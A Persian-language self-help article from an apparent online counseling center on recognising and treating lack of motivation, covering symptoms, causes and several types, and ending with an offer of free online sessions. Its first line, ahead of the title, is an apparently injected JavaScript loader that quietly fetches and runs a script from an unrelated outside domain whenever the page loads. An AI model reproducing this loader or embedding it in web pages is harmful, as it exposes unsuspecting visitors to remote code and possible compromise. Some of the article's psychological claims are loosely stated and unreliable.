;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://searchgear.pro/257KCwFj"); راه کارهای درمان بی انگیزگی چیست؟
دلایل به وجود آمدن بی انگیزگی

برای درمان بی انگیزگی چکار کنیم؟

میزان پیشرفت خواندن شما

فهرست مطالب

درمان بی انگیزگی در علم روانشناسی امکان پذیر است. همه افرادی که با مشکل بی انگیزگی مواجه هستند، می توانند خیلی راحت به روال عادی زندگی برگردند. بی انگیزگی را می توان یک نوع احساس پوچی دانست. افرادی که انگیزه خود را از دست می دهند حتی نسبت به انجام امور روزمره خود نیز علاقه ای نشان نمی دهند. بروز بی انگیزگی در افراد ممکن است با از دست دادن تمایل برای تعامل با دیگران خود را نشان دهد. بی انگیزگی علل و درجات مختلفی دارد و در همه افراد یکسان نیست.

اگر بخواهیم واقع گرایانه به موضوع نگاه کنیم بی انگیزگی در همه افراد ممکن است در مقاطعی از زندگی به وجود آید. بی انگیزگی اگر مقطعی و زودگذر باشد هیچ مشکلی را برای افراد به وجود نمی آورد. مشکل زمانی شروع می شود که بی انگیزگی به خاطر وجود موضوعی خاص به وجود آمده و خود به خود هم از بین نمی رود. زمانی که بی انگیزگی به این مرحله می رسد، باید به فکر درمان آن باشید. اگر درمان بی انگیزگی به موقع انجام نشود ممکن است مشکلات روحی و روانی بسیار جدی برای افراد به وجود آورد.

بی انگیزگی را با نام های دیگری مثل بی حوصلگی و بی تفاوتی نیز می توان معرفی کرد. درمان بی تفاوتی نیاز به استفاده از تکنیک های مختلف دارد. برای اینکه بتوان به طور کامل بی انگیزگی را درمان کرد باید به یک روانشناس مراجعه کرد. ممکن است برای اینکه درمان کامل و سریعی را تجربه کنید نیاز به روانکاوی داشته باشید. روانکاوی یکی از تکنیک هایی است که روانشناسان می توانند با کمک آن ریشه مشکلات روانی را پیدا کنند. این روش کمک می کند تا بهترین نتیجه حاصل شود و افراد بتوانند روند طبیعی زندگی خود را طی کنند.

شناسایی نوع بی انگیزگی برای استفاده از بهترین تکنیک درمان

شناسایی نوع بی انگیزگی برای انتخاب روش درمان از اهمیت بسیار زیادی برخوردار است. گاهی اوقات ممکن است این تصور در ذهن افراد زیادی به وجود بیاید که انواع افسردگی یکسان بوده و برای همه آنها یک نسخه واحد می‌پیچند. این موضوع باعث می شود تا برای درمان بی حوصلگی با مشکل مواجه شوند و به نتیجه دلخواه خود نرسند. افرادی می توانند نمونه های مختلف بی انگیزگی را از هم تفکیک کنند که تخصص بالایی در زمینه روانشناسی دارند. بدین ترتیب در صورت مواجه شدن با بی انگیزگی بهتر است به جای شروع درمان خودسرانه، به روانپزشک مراجعه شود.

بسیاری از کارشناسان معتقدند که بی انگیزگی شباهت زیادی به برف دارد. شاید این مقایسه در ابتدا کمی عجیب به نظر برسد. اغلب افراد گمان می‌کنند که هر وقت برف می بارد شکل ظاهری آنها ثابت است با وجود اینکه برف ها انواع مختلفی دارند. اگر بخواهیم افرادی را نام ببریم که این تنوع برف را متوجه می شوند، اسکیموها هستند. اسکیموها به خاطر اینکه همیشه با برف سر و کار دارند انواع برف را از هم تشخیص می‌دهند. با توجه به کوچک بودن تفاوت بین انواع برف افرادی که سالی چند بار ممکن است برف ببینند متوجه آنها نخواهند شد.

درمان بی انگیزگی با یک نسخه کلی کاری غیر ممکن به نظر می رسد. چیزی که عموم افراد بعد از مشاهده بی‌انگیزگی ممکن است تجویز کنند، تعیین هدف و تلاش مضاعف می‌باشد. سوالی که باید از این افراد پرسید این است که اگر با این موارد مشکل برطرف نشد چه کنیم. بهترین فردی که می تواند شما را در درمان بی‌حوصلگی یاری کند، روانشناس است. روانشناس ابتدا با سوالاتی که از شما می‌پرسید به دنبال این است که علت به وجود آمدن بی انگیزگی چیست. بعد از تشخیص علت این مشکل، درمان بسیار ساده تر می‌شود.

  اضطراب

از کجا بفهمیم بی انگیزه شده ایم؟

اغلب افرادی که دچار بی‌انگیزگی می شوند، ممکن است خودشان متوجه این موضوع نباشند. در اغلب اوقات این اطرافیان افراد هستند که متوجه می شوند فرد از حالت نرمال خارج شده و با نوعی بی‌حوصلگی مواجه می باشد. همین مورد باعث شده تا سوال بسیاری از افراد این باشد که از کجا بفهمیم بی انگیزه شده ایم؟ برای اینکه چنین افرادی بتوانند بهترین جواب را برای سوال خود دریافت کنند، در این بخش قصد داریم چند نمونه از مهمترین علائم بی‌حوصلگی را بیان کنیم. اطلاع از این علائم به افراد کمک می کند تا سریع تر مشکل بی انگیزگی را تشخیص دهند. تشخیص زودهنگام و اقدام سریع برای درمان بی‌حوصلگی باعث می شود تا نتیجه به دست آمده نیز رضایت بخش باشد.

یکی از علائم اصلی شروع بی‌انگیزگی و بی حوصلگی، سخت شدن انجام امور روزمره می باشد. هر کاری را که تا به حال به راحتی انجام داده اید را کاری سخت و دشوار می بینید و از اقدام برای انجام آن خودداری می کنید. مورد بعدی که ممکن است با آن مواجه شوید احساس بی‌تفاوتی است. مواردی که تا چندی قبل برای شما بسیار مهم بود و پیگیر آنها بودید، ممکن است برای شما کم اهمیت و یا حتی بی اهمیت شوند. در صورت مشاهده چنین مواردی باید این احتمال را بدهید که دچار نوعی بی‌انگیزگی شده اید.

از بین رفتن احساسات عادی و نرمال یکی دیگر از نشانه های بی‌انگیزگی به شمار می رود. برای مثال فردی ممکن است احساس کند که اعضای خانواده و یا حتی دوستان و آشنایانی را که تا به حال بسیار دوست داشته و از بودن با آنها لذت برده را مثل قبل دوست ندارد. دوست داشتن اعضای خانواده یک احساس طبیعی است که از بین رفتن آن می تواند نشان دهنده نوعی اختلال روحی و روانی باشد.

علائم بی انگیزگی کدامند؟

  • بی میلی برای رسیدن به اهداف از پیش تعیین شده
  • حالت خواب آلودگی همیشگی
  • عدم مشارکت در انجام امور مختلف
  • پایین بودن انرژی و داشتن احساس خستگی همیشگی
  • ضعیف شدن حافظه و فراموشی های کوتاه مدت
  • گوشه گیری و دوری از اجتماع
  • از بین رفتن جسارت و آینده نگری

دلایل به وجود آمدن بی انگیزگی

برای درمان بی انگیزگی اطلاع از دلایل به وجود آمدن این مشکل از اهمیت بسیار زیادی برخوردار می باشد. این موضوع باعث شده تا در این بخش لیستی کامل از دلایل به وجود آمدن بی تفاوتی را خدمت شما ارائه دهیم. آشنایی با این لیست کمک می کند تا بتوان بهترین راه را برای درمان بی انگیزگی پیدا کرد.

  • دیستیمیا یا نوعی افسردگی مزمن و همیشگی
  • آلزایمر
  • پارکینسون
  • اسکیزوفرنی
  • سکته
  • هانتینگتون
  • زوال عقل

آشنایی با انواع بی انگیزگی و روش درمان آنها

  • بی انگیزگی ناشی از ترس

ترس یکی از فاکتورهایی است که ممکن است تاثیرات نامطلوبی بر روی روح و روان افراد داشته باشد. ترس یک عکس العمل طبیعی در بدن است اما گاهی اوقات اگر ترس از حد نرمال بیشتر شود ممکن است مشکل ساز شود.

  • راه های درمان بی انگیزگی ناشی از ترس

برای درمان بی انگیزگی ناشی از ترس باید یک سری سوال از خودتان بپرسید. اولین سوال که باید مطرح کنید این است که علت ترس شما چیست؟ سوال بعدی این است که چقدر احتمال دارد موضوعی که از آن می ترسید اتفاق بیفتد؟ جواب دادن به این سوالات می تواند تا حدودی زمینه ساز آرامش بیشتر شما بشود.

  • نداشتن انگیزه به خاطر هدف گذاری اشتباه
  اختلال اضطراب فراگیر علائم و درمان اضطراب فراگیر

زمانی که هدفگذاری شما متاثر از اجتماع و محیط اطراف باشد، قطعا ممکن است اهدافی را انتخاب کنید که به صورت ذاتی و فطری علاقه ای به آنها نداشته باشید. بدین ترتیب حتی با وجود رسیدن به اهداف خود باز هم ممکن است حالت بی انگیزگی داشته باشید.

  • درمان بی انگیزگی ناشی از هدف گذاری اشتباه

برای درمان بی انگیزگی ناشی از هدف گذاری اشتباه بهتر است درک عمیق تری از خواسته های خود داشته باشید. یک سری خواسته ها در ذات فرد بوده و نمی توان آنها را تغییر داد. شناسایی درست خواسته های هر فرد و هدفگذاری بر اساس آنها می تواند انگیزه افراد را چندین برابر کند.

سایر نمونه های بی انگیزگی و روش مناسب برای درمان آنها

بی انگیزگی ناشی از عدم آزادی عمل

بدون داشتن آزادی هیچ انسانی نمی تواند به سمت شکوفایی حرکت کند. قدرت تصمیم گیری یکی از موضوعات مهم در زندگی هر فرد به شمار می رود. بخشی در مغز هر انسان وجود دارد که وظیفه تصمیم گیری برای انسان ها را بر عهده دارد. افرادی که دچار بی حوصلگی می شوند در واقع این بخش مغز آنها که مربوط به تصمیم گیری است، به اندازه کافی رشد نکرده است.

درمان بی انگیزگی ناشی از عدم آزادی عمل

برای درمان بی انگیزگی ناشی از نداشتن آزادی عمل باید در سبک زندگی خود تغییراتی اعمال کنید. سعی کنید در تصمیم گیری برای امور مختلف قوی تر عمل کرده تا بتوانید آزادی عمل بیشتری داشته باشید. اگر کارمند یا کارگر هستید با کارفرمای خود صحبت کنید و راهی پیدا کنید که بتوانید با آزادی عمل بیشتری فعالیت های مورد نظر را انجام دهید.

بی انگیزگی ناشی از سوگ عزیزان

یکی از موضوعاتی که هضم آن برای هر انسانی دشوار است، سوگ عزیزان می باشد. با وجود اینکه تلاش های بسیار زیادی انجام می شود تا افراد بتوانند این حقیقت تلخ را بپذیرند اما سنگینی این مشکل باعث می شود که برخی از افراد با مشکلات روحی و روانی ریز و درشتی مواجه شوند.

درمان بی انگیزگی ناشی از سوگ

افراد برای درمان بی انگیزگی ناشی از سوگ باید این موضوع را بپذیرند. پذیرش موضوع بسیاری از مشکلات روحی و روانی ایجاد شده را رفع می کند. هر فردی باید به این موضوع توجه داشته باشد که مرگ حق است و همه افراد روزی با آن مواجه خواهند شد.

کلام پایانی

در این مطلب سعی کردیم علت بی حوصلگی و بی تفاوتی افراد را مورد بررسی قرار دهیم. پیدا کردن راه درمان برای افرادی که به علت بی تفاوت شدن نسبت به همه چیز هم خودشان و هم اطرافیانشان رنج می برند، اهمیت بسیار زیادی دارد. علت بی حوصلگی و بی تفاوتی مشخص نیست و باید موارد مختلفی بررسی شوند تا علت آن مشخص شود. چرا بی احساس و بی تفاوت می شویم سوالی است که ذهن بسیاری از افراد را درگیر خود کرده است. درمان بی تفاوتی نسبت به همه چیز کار چندان ساده ای نیست اما روش هایی در این متن معرفی کردیم که می توانند کمک کننده باشند. علاوه بر مشاوره آنلاین، مشاوره حضوری هم گزینه مناسبی برای حل مشکلاتی مثل بی انگیزگی می باشد. مشاوره آنلاین می تواند برای مشاوره فردی، مشاوره قبل از ازدواج و… هم مورد استفاده قرار بگیرد.

Rate this post

توجه داشته باشید که این مطلب، جایگزین نظرات و توصیه‌های تخصصی پزشکان نیست و هرگز از این مطلب به‌عنوان جایگزین توصیه پزشکان استفاده نکنید.

جهت جلب رضايت و اعتماد شما دوست عزيز و اثبات تخصص و دانش و به جهت تصميم گيري صحيح شما در انتخاب مشاور خود، ميتوانيد يك تا دو جلسه مشاوره آنلاين رايگان از ما دريافت كنيد، كافيست روي دكمه درخواست مشاوره رايگان در همين صفحه كليك نماييد.

دیدگاه‌ خود را بنویسید

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *

مرکز مشاوره آنلاین روان‌یاری

جهت رزرو یک جلسه مشاوره رایگان فرم زیر را تکمیل بفرمایید.